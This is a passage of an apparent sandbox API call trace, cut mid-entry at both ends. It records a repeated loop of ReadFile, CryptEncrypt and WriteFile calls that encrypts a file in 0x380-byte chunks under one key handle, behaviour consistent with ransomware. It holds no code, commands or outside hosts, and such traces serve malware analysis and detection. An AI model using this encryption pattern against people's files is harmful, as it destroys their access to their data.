lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.631] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.631] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.631] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.631] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.632] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.632] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.632] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.632] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.632] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.633] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.634] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.635] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.636] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.637] CryptEncrypt 